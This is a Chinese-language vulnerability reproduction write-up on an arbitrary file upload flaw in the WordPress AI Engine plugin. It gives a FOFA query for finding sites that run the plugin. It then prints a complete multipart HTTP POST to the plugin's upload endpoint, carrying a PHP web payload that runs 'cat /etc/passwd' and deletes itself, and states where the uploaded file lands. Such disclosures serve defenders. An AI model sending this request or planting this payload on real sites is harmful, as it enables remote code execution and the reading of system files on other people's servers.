登录 白背景

Wordpress AI Engine插件存在任意文件上传漏洞

一、漏洞简介

wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。Wordpress saveconfiguration接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。

二、影响版本

  • Wordpress AI Engine插件

三、资产测绘

  • fofa"wp-content/plugins/ai-engine/"
  • 特征

1710864165592-fb246a85-e09c-4334-9493-4a4ccaf152e7.png

四、漏洞复现

POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Type: multipart/form-data; boundary=------------------------7bghbgerugy87gerbuy
Connection: close
Content-Length: 244

--------------------------7bghbgerugy87gerbuy
Content-Disposition: form-data; name="file"; filename="ceshi.php"
Content-Type: text/plain

<?php system("cat /etc/passwd");unlink(__FILE__);?>
--------------------------7bghbgerugy87gerbuy--

1715325493582-64721718-86fa-4f6e-b3a4-258e79dceb81.png

文件位置

/wp-content/uploads/2024/05/ceshi.php

1715325527973-b8c442ee-69b2-4916-9b52-8866a84fe283.png

原文: https://www.yuque.com/xiaokp7/ocvun2/sniregbl16t8218k